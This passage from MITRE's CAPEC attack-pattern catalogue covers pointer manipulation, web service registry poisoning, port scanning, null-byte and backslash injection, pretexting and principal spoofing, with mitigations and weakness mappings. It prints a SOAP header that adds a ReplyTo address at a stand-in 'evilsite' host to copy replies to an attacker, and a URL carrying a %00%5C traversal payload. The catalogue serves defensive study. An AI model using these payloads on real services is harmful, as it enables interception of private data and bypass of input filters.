View Name	Top Level Categories
Domains of Attack	Hardware, Supply Chain, Physical Security
Mechanisms of Attack	Manipulate System Resources
Supply Chain Risks	Sustainment

Example Instances

A malicious subcontractor or subcontractor's employee that is responsible for system maintenance secretly replaces a hard drive with one containing malicious code that will allow for backdoor access once deployed.

Related Weaknesses

CWE-ID	Weakness Name
1263	Improper Physical Access Control

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Attack_Prerequisites, Description Summary, Examples-Instances, References, Related_Attack_Patterns, Typical_Severity
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Description Summary, Examples-Instances, Typical_Likelihood_of_Exploit
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Example_Instances
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated @Name, Related_Weaknesses
Previous Entry Names
Change Date	Previous Entry Name
2015-11-09 (Version 2.7)	Hacking Hardware Devices or Components

2020-07-30 (Version 3.3)	Hacking Hardware

CAPEC-129: Pointer Manipulation

Attack Pattern ID: 129

Abstraction: Meta

View customized information:

Description

Typical Severity

Medium

Relationships

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Manipulate Data Structures

Prerequisites

The target application must have a pointer variable that the attacker can influence to hold an arbitrary value.

Resources Required

None: No specialized resources are required to execute this type of attack.

Related Weaknesses

CWE-ID	Weakness Name
682	Incorrect Calculation
822	Untrusted Pointer Dereference
823	Use of Out-of-range Pointer Offset

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Description Summary, Related_Attack_Patterns
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Resources_Required
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
Previous Entry Names
Change Date	Previous Entry Name
2017-01-09 (Version 2.9)	Pointer Attack

CAPEC-51: Poison Web Service Registry

Attack Pattern ID: 51

Abstraction: Detailed

View customized information:

Description

Extended Description

WS-Addressing is used to virtualize services, provide return addresses and other routing information, however, unless the WS-Addressing headers are protected they are vulnerable to rewriting. Content in a registry is deployed by the service provider. The registry in an SOA or Web Services system can be accessed by the service requester via UDDI or other protocol.

Likelihood Of Attack

High

Typical Severity

Very High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	203	Manipulate Registry Information

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Manipulate System Resources

Execution Flow

Explore

Find a target SOA or Web Service: The adversary must first indentify a target SOA or Web Service.

Experiment

Determine desired outcome: Because poisoning a web service registry can have different outcomes, the adversary must decide how they wish to effect the webservice.
Techniques
An adversary can perform a denial of service attack on a web service.
An adversary can redirect requests or responses to a malicious service.

Determine if a malicious service needs to be created: If the adversary wishes to redirect requests or responses, they will need to create a malicious service to redirect to.

Techniques
Create a service to that requests are sent to in addition to the legitimate service and simply record the requests.
Create a service that will give malicious responses to a service provider.
Act as a malicious service provider and respond to requests in an arbitrary way.

Exploit

Poison Web Service Registry: Based on the desired outcome, poison the web service registry. This is done by altering the data at rest in the registry or uploading malicious content by spoofing a service provider.

Techniques
Intercept and change WS-Adressing headers to route to a malicious service or service provider.
Provide incorrect information in schema or metadata to cause a denial of service.
Delete information about service procider interfaces to cause a denial of service.

Prerequisites

The attacker must be able to write to resources or redirect access to the service registry.

Skills Required

[Level: Low]

To identify and execute against an over-privileged system interface

Resources Required

Capability to directly or indirectly modify registry resources

Consequences

Scope	Impact	Likelihood
Confidentiality Integrity Availability	Execute Unauthorized Commands
Confidentiality	Read Data
Integrity	Modify Data

Mitigations

Design: Enforce principle of least privilege

Design: Harden registry server and file access permissions

Implementation: Implement communications to and from the registry using secure protocols

Example Instances

WS-Addressing provides location and metadata about the service endpoints. An extremely hard to detect attack is an attacker who updates the WS-Addressing header, leaves the standard service request and service provider addressing and header information intact, but adds an additional WS-Addressing Replyto header. In this case the attacker is able to send a copy (like a cc in mail) of every result the service provider generates. So every query to the bank account service, would generate a reply message of the transaction status to both the authorized service requester and an attacker service. This would be extremely hard to detect at runtime.

<S:Header>

<wsa:MessageID>

http://example.com/Message

</wsa:MessageID>
<wsa:ReplyTo>

<wsa:Address>http://valid.example/validClient</wsa:Address>

</wsa:ReplyTo>
<wsa:ReplyTo>

<wsa:Address>http://evilsite/evilClient</wsa:Address>

</wsa:ReplyTo>
<wsa:FaultTo>

<wsa:Address>http://validfaults.example/ErrorHandler</wsa:Address>

</wsa:FaultTo>

</S:Header>

In this example "evilsite" is an additional reply to address with full access to all the messages that the authorized (validClient) has access to. Since this is registered with ReplyTo header it will not generate a Soap fault.

Related Weaknesses

CWE-ID	Weakness Name
285	Improper Authorization
74	Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
693	Protection Mechanism Failure

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated Description, Execution_Flow
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Example_Instances

CAPEC-300: Port Scanning

Attack Pattern ID: 300

Abstraction: Standard

View customized information:

Description

Extended Description

Although common services have assigned port numbers, services and applications can run on arbitrary ports. Additionally, port scanning is complicated by the potential for any machine to have up to 65535 possible UDP or TCP services. The goal of port scanning is often broader than identifying open ports, but also give the adversary information concerning the firewall configuration.

Depending upon the method of scanning that is used, the process can be stealthy or more obtrusive, the latter being more easily detectable due to the volume of packets involved, anomalous packet traits, or system logging. Typical port scanning activity involves sending probes to a range of ports and observing the responses. There are four port statuses that this type of attack aims to identify: open, closed, filtered, and unfiltered. For strategic purposes it is useful for an adversary to distinguish between an open port that is protected by a filter vs. a closed port that is not protected by a filter. Making these fine grained distinctions is requires certain scan types. Collecting this type of information tells the adversary which ports can be attacked directly, which must be attacked with filter evasion techniques like fragmentation, source port scans, and which ports are unprotected (i.e. not firewalled) but aren't hosting a network service. An adversary often combines various techniques in order to gain a more complete picture of the firewall filtering mechanisms in place for a host.

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	169	Footprinting
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	287	TCP SYN Scan
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	301	TCP Connect Scan
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	302	TCP FIN Scan
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	303	TCP Xmas Scan
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	304	TCP Null Scan
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	305	TCP ACK Scan
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	306	TCP Window Scan
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	307	TCP RPC Scan
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	308	UDP Scan

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

The adversary requires logical access to the target's network in order to carry out this type of attack.

Resources Required

The adversary requires a network mapping/scanning tool, or must conduct socket programming on the command line. Packet injection tools are also useful for this purpose. Depending upon the method used it may be necessary to sniff the network in order to see the response.

Consequences

Scope	Impact	Likelihood
Confidentiality	Other
Confidentiality Access Control Authorization	Bypass Protection Mechanism Hide Activities

Related Weaknesses

CWE-ID	Weakness Name
200	Exposure of Sensitive Information to an Unauthorized Actor

Notes

Other

There are four types of port status that this type of attack aims to identify: 1) Open Port: The port is open and a firewall does not block access to the port, 2) Closed Port: The port is closed (i.e. no service resides there) and a firewall does not block access to the port, 3) Filtered Port: A firewall or ACL rule is blocking access to the port in some manner, although the presence of a listening service on the port cannot be verified, and 4) Unfiltered Port: A firewall or ACL rule is not blocking access to the port, although the presence of a listening service on the port cannot be verified.

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1046	Network Service Scanning

References

[REF-33] Stuart McClure, Joel Scambray and George Kurtz. "Hacking Exposed: Network Security Secrets & Solutions". Chapter 2: Scanning, pg. 54. 6th Edition. McGraw Hill. 2009.

[REF-158] J. Postel. "RFC768 - User Datagram Protocol". 1980-08-28. <http://www.faqs.org/rfcs/rfc768.html>.

[REF-34] Gordon "Fyodor" Lyon. "Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning". Section 4.1 Introduction to Port Scanning, pg. 73. 3rd "Zero Day" Edition,. Insecure.com LLC, ISBN: 978-0-9799587-1-7. 2008.

[REF-130] Gordon "Fyodor" Lyon. "The Art of Port Scanning". Volume: 7, Issue. 51. Phrack Magazine. 1997. <http://phrack.org/issues/51/11.html>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Prerequisites, Description, Description Summary, References, Related_Weaknesses, Resources_Required
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Attack_Patterns, Taxonomy_Mappings
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Description, Notes
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description

CAPEC-53: Postfix, Null Terminate, and Backslash

Attack Pattern ID: 53

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	267	Leverage Alternate Encoding

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Manipulate Data Structures

Execution Flow

Explore

Survey the application for user-controllable inputs: Using a browser, an automated tool or by inspecting the application, an adversary records all entry points to the application.

Techniques
Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.
Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.
Manually inspect the application to find entry points.

Experiment

Probe entry points to locate vulnerabilities: The adversary uses the entry points gathered in the "Explore" phase as a target list and injects postfix null byte(s) followed by a backslash to observe how the application handles them as input. The adversary is looking for areas where user input is placed in the middle of a string, and the null byte causes the application to stop processing the string at the end of the user input.
Techniques
Try different encodings for null such as \0 or %00 followed by an encoding for the backslash character.

Exploit

Remove data after null byte(s): After determined entry points that are vulnerable, the adversary places a null byte(s) followed by a backslash such that they bypass an input filter and remove data after the null byte(s) in a way that is beneficial to them.
Techniques
If the input is a directory as part of a longer file path, add a null byte(s) followed by a backslash at the end of the input to try to traverse to the given directory.

Prerequisites

Null terminators are not properly handled by the filter.

Skills Required

[Level: Medium]

An adversary needs to understand alternate encodings, what the filter looks for and the data format acceptable to the target API

Indicators

Null characters are observed by the filter. The filter needs to be able to understand various encodings of the Null character, or only canonical data should be passed to it.

Consequences

Scope	Impact	Likelihood
Integrity	Modify Data
Confidentiality	Read Data
Confidentiality Access Control Authorization	Gain Privileges

Mitigations

Properly handle Null characters. Make sure canonicalization is properly applied. Do not pass Null characters to the underlying APIs.

Example Instances

A rather simple injection is possible in a URL:

http://getAccessHostname/sekbin/
helpwin.gas.bat?mode=&draw=x&file=x&module=&locale=[insert relative path here]
[%00][%5C]&chapter=

This attack has appeared with regularity in the wild. There are many variations of this kind of attack. Spending a short amount of time injecting against Web applications will usually result in a new exploit being discovered.

Related Weaknesses

CWE-ID	Weakness Name
158	Improper Neutralization of Null Byte or NUL Character
172	Encoding Error
173	Improper Handling of Alternate Encoding
74	Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
20	Improper Input Validation
697	Incorrect Comparison
707	Improper Neutralization

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-1] G. Hoglund and G. McGraw. "Exploiting Software: How to Break Code". Addison-Wesley. 2004-02.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Related_Attack_Patterns
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Mitigations
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Weaknesses
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Execution_Flow, Skills_Required
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Example_Instances

CAPEC-407: Pretexting

Attack Pattern ID: 407

Abstraction: Standard

View customized information:

Description

Extended Description

Pretexting can also be used to impersonate people in certain jobs and roles that they never themselves have done. In simple form, these attacks can be leveraged to learn information about a target. More complicated iterations may seek to solicit a target to perform some action that assists the adversary in exploiting organizational weaknesses or obtaining access to secure facilities or systems. Pretexting is not a one-size fits all solution. Good information gathering techniques can make or break a good pretext. A solid pretext is an essential part of building trust. If an adversary’s alias, story, or identity has holes or lacks credibility or even the perception of credibility the target will most likely catch on.

Likelihood Of Attack

Medium

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	410	Information Elicitation
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	416	Manipulate Human Behavior
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	383	Harvesting Information via API Event Monitoring
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	412	Pretexting via Customer Service
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	413	Pretexting via Tech Support
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	414	Pretexting via Delivery Person
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	415	Pretexting via Phone
CanPrecede	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	163	Spear Phishing

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Social Engineering
Mechanisms of Attack	Engage in Deceptive Interactions, Collect and Analyze Information

Prerequisites

The adversary must have the means and knowledge of how to communicate with the target in some manner.The adversary must have knowledge of the pretext that would influence the actions of the specific target.

Skills Required

[Level: Low]

The adversary requires strong inter-personal and communication skills.

Consequences

Scope	Impact	Likelihood
Confidentiality	Other

Mitigations

An organization should provide regular, robust cybersecurity training to its employees to prevent successful social engineering attacks.

Example Instances

The adversary dresses up like a jogger and runs in place by the entrance of a building, pretending to look for their access card. Because the hood obscures their face, it may be possible to solicit someone inside the building to let them inside.

Related Weaknesses

Social Engineering: CWE does not currently cover Social Engineering in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1589	Gather Victim Identity Information

References

[REF-348] "The Official Social Engineering Portal". Social-Engineer.org. Tick Tock Computers, LLC. <http://www.social-engineer.org>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Examples-Instances, Methods_of_Attack, Related_Attack_Patterns, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Related_Attack_Patterns
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings
Previous Entry Names
Change Date	Previous Entry Name
2017-08-04 (Version 2.11)	Social Information Gathering via Pretexting

CAPEC-412: Pretexting via Customer Service

Attack Pattern ID: 412

Abstraction: Detailed

View customized information:

Description

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	407	Pretexting

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Social Engineering
Mechanisms of Attack	Engage in Deceptive Interactions, Collect and Analyze Information

Related Weaknesses

Social Engineering: CWE does not currently cover Social Engineering in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-348] "The Official Social Engineering Portal". Social-Engineer.org. Tick Tock Computers, LLC. <http://www.social-engineer.org>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Description Summary
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns

CAPEC-414: Pretexting via Delivery Person

Attack Pattern ID: 414

Abstraction: Detailed

View customized information:

Description

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	407	Pretexting

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Social Engineering
Mechanisms of Attack	Engage in Deceptive Interactions, Collect and Analyze Information

Related Weaknesses

Social Engineering: CWE does not currently cover Social Engineering in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-348] "The Official Social Engineering Portal". Social-Engineer.org. Tick Tock Computers, LLC. <http://www.social-engineer.org>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Description Summary
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns

CAPEC-415: Pretexting via Phone

Attack Pattern ID: 415

Abstraction: Detailed

View customized information:

Description

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	407	Pretexting

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Social Engineering
Mechanisms of Attack	Engage in Deceptive Interactions, Collect and Analyze Information

Related Weaknesses

Social Engineering: CWE does not currently cover Social Engineering in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-348] "The Official Social Engineering Portal". Social-Engineer.org. Tick Tock Computers, LLC. <http://www.social-engineer.org>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Description Summary
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns

CAPEC-413: Pretexting via Tech Support

Attack Pattern ID: 413

Abstraction: Detailed

View customized information:

Description

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	407	Pretexting

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Social Engineering
Mechanisms of Attack	Engage in Deceptive Interactions, Collect and Analyze Information

Related Weaknesses

Social Engineering: CWE does not currently cover Social Engineering in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-348] "The Official Social Engineering Portal". Social-Engineer.org. Tick Tock Computers, LLC. <http://www.social-engineer.org>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Description Summary
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns

CAPEC-195: Principal Spoof

Attack Pattern ID: 195

Abstraction: Standard

View customized information:

Description

Extended Description

The possible outcomes of a Principal Spoof mirror those of Identity Spoofing. (e.g., escalation of privilege and false attribution of data or activities) Likewise, most techniques for Identity Spoofing (crafting messages or intercepting and replaying or modifying messages) can be used for a Principal Spoof attack. However, because a Principal Spoof is used to impersonate a person, social engineering can be both an attack technique (using social techniques to generate evidence in support of a false identity) as well as a possible outcome (manipulating people's perceptions by making statements or performing actions under a target's name).

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	151	Identity Spoofing
